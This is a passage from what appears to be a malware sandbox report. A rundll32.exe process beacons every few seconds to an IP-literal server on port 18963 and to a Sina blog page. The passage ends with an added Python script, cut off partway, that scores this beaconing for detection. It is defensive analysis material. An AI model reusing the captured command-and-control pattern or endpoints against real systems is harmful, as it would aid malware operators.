Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
41          192.168.2.11  49779        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:32.443223000 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
42          192.168.2.11  49780        107.163.56.232  18963             1232  C:\Windows\SysWOW64\rundll32.exe

Timestamp                            Bytes transferred  Direction
Dec 19, 2024 15:45:32.563079119 CET  183                OUT
Data:
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.11 | 49781 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:32.565167904 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:45:34.273015022 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:45:34 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.11 | 49783 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:36.434906006 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.11 | 49784 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:36.547027111 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.11 | 49785 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:36.547036886 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:45:38.289331913 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:45:38 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.11 | 49787 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:40.437948942 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.11 | 49788 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:40.609720945 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.11 | 49789 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:40.610619068 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:45:43.137818098 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:45:42 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.11 | 49792 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:44.559549093 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.11 | 49793 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:44.672339916 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.11 | 49794 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:44.672871113 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.11 | 49795 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:48.575156927 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.11 | 49796 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:48.751569986 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.11 | 49797 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:48.752084970 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.11 | 49798 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:52.753252983 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.11 | 49799 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:52.906728029 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.11 | 49800 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:52.910507917 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.11 | 49801 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:45:56.872338057 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        60192.168.2.1149802116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:57.024122000 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        61192.168.2.1149803107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:45:57.027714014 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        62192.168.2.1149804107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:00.992532969 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        63192.168.2.1149806107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:01.254297972 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        64192.168.2.1149805116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:01.256083965 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:02.961694002 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:02 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        65192.168.2.1149808107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:05.162971973 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        66192.168.2.1149809116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:05.163181067 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:06.978075027 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:06 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        67192.168.2.1149810107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:05.353919029 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        68192.168.2.1149813107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:09.139760017 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        69192.168.2.1149814107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:09.268117905 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        70192.168.2.1149815116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:09.268300056 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn
                                                                                                                                                                        Dec 19, 2024 15:46:10.975152016 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                        Server: nginx/1.2.8
                                                                                                                                                                        Date: Thu, 19 Dec 2024 14:46:10 GMT
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        71192.168.2.1149818107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:13.423002005 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        72192.168.2.1149819107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:13.426078081 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        73192.168.2.1149820116.133.8.92801232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:15.781593084 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                                                        Host: blog.sina.com.cn


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        74192.168.2.1149821107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:17.631674051 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        75192.168.2.1149822107.163.56.232189631232C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 19, 2024 15:46:17.744081974 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                                                        Host: 107.163.56.232:18963
                                                                                                                                                                        Cache-Control: no-cache


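The sessions above show one process (PID 1232, rundll32.exe) working through a roughly four-second cycle against two targets: GET /main.php on 107.163.56.232:18963, which is HTTP on a non-standard port with an IP-literal Host header and a Firefox 3.6 User-Agent, and GET /u/5762479093 on blog.sina.com.cn with an IE8 User-Agent, answered each time by a 302 to the https URL. The script below is an added example of how a detection engineer would score that pattern from session records; it is not Joe Sandbox code. The SESSIONS list is transcribed from the table above (session id, target, request timestamp); the burst window, jitter tolerance, regularity threshold and the set of "standard" HTTP ports are assumptions chosen for illustration. It collapses the paired requests that occur within a fraction of a second into one burst before measuring the interval, because raw inter-request gaps alternate short/long and would otherwise hide the period.

```python
"""Beacon and port-anomaly checks over the HTTP sessions listed above.

Added example, not Joe Sandbox code. SESSIONS is transcribed from the report's
network table for PID 1232 (rundll32.exe). The thresholds (1 s burst window,
25 % jitter tolerance, 75 % regular gaps, 4 bursts) and STANDARD_HTTP_PORTS are
illustrative assumptions, not values from the report.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime
from statistics import median

IE8 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)"
FF36 = ("Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) "
        "Gecko/20110303 Firefox/3.6.15")
# target = (destination ip, destination port, Host header, path, User-Agent)
SINA = ("116.133.8.92", 80, "blog.sina.com.cn", "/u/5762479093", IE8)
MAIN = ("107.163.56.232", 18963, "107.163.56.232:18963", "/main.php", FF36)
# (session id, target, request timestamp exactly as the report prints it)
SESSIONS = [
    (58, SINA, "Dec 19, 2024 15:45:52.910507917 CET"),
    (59, MAIN, "Dec 19, 2024 15:45:56.872338057 CET"),
    (60, SINA, "Dec 19, 2024 15:45:57.024122000 CET"),
    (61, MAIN, "Dec 19, 2024 15:45:57.027714014 CET"),
    (62, MAIN, "Dec 19, 2024 15:46:00.992532969 CET"),
    (63, MAIN, "Dec 19, 2024 15:46:01.254297972 CET"),
    (64, SINA, "Dec 19, 2024 15:46:01.256083965 CET"),
    (65, MAIN, "Dec 19, 2024 15:46:05.162971973 CET"),
    (66, SINA, "Dec 19, 2024 15:46:05.163181067 CET"),
    (67, MAIN, "Dec 19, 2024 15:46:05.353919029 CET"),
    (68, MAIN, "Dec 19, 2024 15:46:09.139760017 CET"),
    (69, MAIN, "Dec 19, 2024 15:46:09.268117905 CET"),
    (70, SINA, "Dec 19, 2024 15:46:09.268300056 CET"),
    (71, MAIN, "Dec 19, 2024 15:46:13.423002005 CET"),
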